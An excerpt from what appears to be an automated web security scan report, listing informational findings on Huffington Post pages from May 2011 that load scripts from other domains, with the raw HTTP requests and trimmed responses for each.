  • http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007
  • http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&v46884
  • http://s.huffpost.com/assets/js.php?f=v.js&v47053
  • http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

GET /2011/05/04/cnn-poll-finds-that-most-_n_857597.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 256417
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:58:26 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<!-- core ad call for AOL AdTech -->
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=ie.css%2Cie7.css&amp;v46998" type="text/css" media="screen" />        
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&amp;v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&amp;v47053"></script>
...[SNIP]...
<!-- CommentsV3 -->
<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&amp;v46884"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.116. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/04/osama-bin-laden-pictures_n_857568.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.pubmatic.com/AdServer/js/universalpixel.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
  • http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007
  • http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&v46884
  • http://s.huffpost.com/assets/js.php?f=v.js&v47014
  • http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

GET /2011/05/04/osama-bin-laden-pictures_n_857568.html HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.6.10.1304575105; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; s_pers=%20s_getnr%3D1304575170358-New%7C1367647170358%3B%20s_nrgvo%3DNew%7C1367647170363%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Breaking%25252520News%25252520and%25252520Opinion%25252520on%25252520The%25252520Huffington%25252520Post%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Thu, 05 May 2011 01:00:22 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 01:00:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 279875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<!-- core ad call for AOL AdTech -->
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=print-view.css" type="text/css" media="print" />
   
               
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&amp;v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&amp;v47014"></script>
...[SNIP]...
<!-- CommentsV3 -->
<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&amp;v46884"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.117. http://www.huffingtonpost.com/advertise/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /advertise/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.pubmatic.com/AdServer/js/universalpixel.js
  • http://api.recaptcha.net/challenge?k=6Lfu8wAAAAAAAMM1JCZ2z5Ft0VaTS3hB3srqt41R
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
  • http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007
  • http://s.huffpost.com/assets/js.php?f=v.js&v47053
  • http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js
  • http://yui.yahooapis.com/2.8.0r4/build/calendar/calendar-min.js
  • http://yui.yahooapis.com/2.8.0r4/build/yahoo-dom-event/yahoo-dom-event.js

Request

GET /advertise/ HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 96406
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=169
Date: Thu, 05 May 2011 10:58:27 GMT
Connection: close

<script>
ad_ears_on = true;

</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/19
...[SNIP]...
<!-- core ad call for AOL AdTech -->
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=ie.css%2Cie7.css&amp;v46998" type="text/css" media="screen" />        
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&amp;v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&amp;v47053"></script>
...[SNIP]...
<!-- Dependencies -->
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0r4/build/yahoo-dom-event/yahoo-dom-event.js"></script>
...[SNIP]...
<!-- Source file -->
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0r4/build/calendar/calendar-min.js"></script>
...[SNIP]...
<div>
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6Lfu8wAAAAAAAMM1JCZ2z5Ft0VaTS3hB3srqt41R"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.118. http://www.huffingtonpost.com/imam-feisal-abdul-rauf/bin-laden-terrorism_b_857345.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /imam-feisal-abdul-rauf/bin-laden-terrorism_b_857345.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.pubmatic.com/AdServer/js/universalpixel.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
  • http://s.huffpost.com/assets/js.php?f=hp_scrollbar.js%2Ctwitter_serverside.js
  • http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007
  • http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&v46884
  • http://s.huffpost.com/assets/js.php?f=v.js&v47053
  • http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

GET /imam-feisal-abdul-rauf/bin-laden-terrorism_b_857345.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 347610
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:58:35 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<!-- core ad call for AOL AdTech -->
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=ie.css%2Cie7.css&amp;v46998" type="text/css" media="screen" />        
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&amp;v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&amp;v47053"></script>
...[SNIP]...
</div>


<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_scrollbar.js%2Ctwitter_serverside.js"></script>
...[SNIP]...
<!-- CommentsV3 -->
<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&amp;v46884"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.119. http://www.huffingtonpost.com/newsinc/landing_page.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /newsinc/landing_page.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.pubmatic.com/AdServer/js/universalpixel.js
  • http://assets.newsinc.com/ndn.2.js
  • http://o.aolcdn.com/ads/adsWrapper.js
  • http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
  • http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007
  • http://s.huffpost.com/assets/js.php?f=v.js&v47053
  • http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

GET /newsinc/landing_page.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 93085
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=160
Date: Thu, 05 May 2011 10:58:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<!-- core ad call for AOL AdTech -->
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=ie.css%2Cie7.css&amp;v46998" type="text/css" media="screen" />        
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

